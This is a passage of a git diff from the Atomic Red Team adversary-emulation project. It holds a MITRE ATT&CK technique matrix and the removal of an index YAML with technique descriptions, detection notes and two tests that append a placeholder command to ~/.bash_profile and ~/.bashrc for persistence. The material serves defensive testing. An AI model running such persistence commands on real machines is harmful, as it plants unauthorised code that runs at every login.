TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | 
[COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use 
Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) 
| [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Remote System Discovery](../../T1018/T1018.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Visual Basic](../../T1059.005/T1059.005.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Man in the Browser [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | [Domain Account](../../T1136.002/T1136.002.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | +| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Time 
Discovery](../../T1124/T1124.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | | +| | | LSASS Driver [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Accounts](../../T1078.003/T1078.003.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Hidden File System [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Office Application Startup](../../T1137/T1137.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hide Artifacts](../../T1564/T1564.md) | Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Office Test](../../T1137.002/T1137.002.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | +| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 639466f6..30abba87 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1,18085 +1,22 @@ --- -privilege-escalation: - T1546.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.004 - url: https://attack.mitre.org/techniques/T1546/004 - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. - source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: ".bash_profile and .bashrc" - description: |- - Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. - - ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. - - The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - - Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. 
Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware) - id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:28:04.990Z' - created: '2020-01-24T14:13:45.936Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: While users may customize their ~/.bashrc and - ~/.bash_profile files , there are only certain types of commands - that typically appear in these files. Monitor for abnormal commands such as - execution of unknown programs, opening network sockets, or reaching out across - the network when user profiles are loaded during the login process. - x_mitre_data_sources: - - Process use of network - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - Linux - - macOS - identifier: T1546.004 - atomic_tests: - - name: Add command to .bash_profile - auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f - description: 'Adds a command to the .bash_profile file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bash_profile file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> ~/.bash_profile - -' - name: sh - - name: Add command to .bashrc - auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f - description: 'Adds a command to the .bashrc file of the current user - -' - supported_platforms: - - macos - - linux - input_arguments: - command_to_add: - description: Command to add to the .bashrc file - type: string - default: "/path/to/script.py" - executor: - command: 'echo "#{command_to_add}" >> 
~/.bashrc - -' - name: sh - T1548: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548 - url: https://attack.mitre.org/techniques/T1548 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Abuse Elevation Control Mechanism - description: Adversaries may circumvent mechanisms designed to control elevate - privileges to gain higher-level permissions. Most modern systems contain native - elevation control mechanisms that are intended to limit privileges that a - user can perform on a machine. Authorization has to be granted to specific - users in order to perform tasks that can be considered of higher risk. An - adversary can perform several methods to take advantage of built-in control - mechanisms in order to escalate privileges on a system. - id: attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-07-22T21:36:52.825Z' - created: '2020-01-30T13:58:14.373Z' - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process command-line parameters - - API monitoring - - Process monitoring - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). 
- - Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling. - - On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. - - There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1134: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1134 - url: https://attack.mitre.org/techniques/T1134 - - external_id: CAPEC-633 - source_name: capec - url: https://capec.mitre.org/data/definitions/633.html - - url: https://pentestlab.blog/2017/04/03/token-manipulation/ - description: netbiosX. (2017, April 3). Token Manipulation. Retrieved April - 21, 2017. 
- source_name: Pentestlab Token Manipulation - - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing - description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved - April 21, 2017. - source_name: Microsoft Command-line Logging - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft LogonUser - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft DuplicateTokenEx - - url: https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx - description: Microsoft TechNet. (n.d.). Retrieved April 25, 2017. - source_name: Microsoft ImpersonateLoggedOnUser - - url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf - description: 'Atkinson, J., Winchester, R. (2017, December 7). A Process is - No One: Hunting for Token Manipulation. Retrieved December 21, 2017.' - source_name: BlackHat Atkinson Winchester Token Manipulation - description: |- - Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. - - An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. 
[Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation) - - Any standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens. - name: Access Token Manipulation - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-04-16T19:37:02.355Z' - created: '2017-12-14T16:46:06.044Z' - x_mitre_defense_bypassed: - - Windows User Account Control - - System access controls - - File system access controls - - Heuristic Detection - - Host forensic analysis - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Tom Ueltschi @c_APT_ure - - Travis Smith, Tripwire - - Robby Winchester, @robwinchester3 - - Jared Atkinson, @jaredcatkinson - x_mitre_data_sources: - - Authentication logs - - Windows event logs - - API monitoring - - Access tokens - - Process monitoring - - Process command-line parameters - x_mitre_detection: "If an adversary is using a standard command-line shell, - analysts can detect token manipulation by auditing 
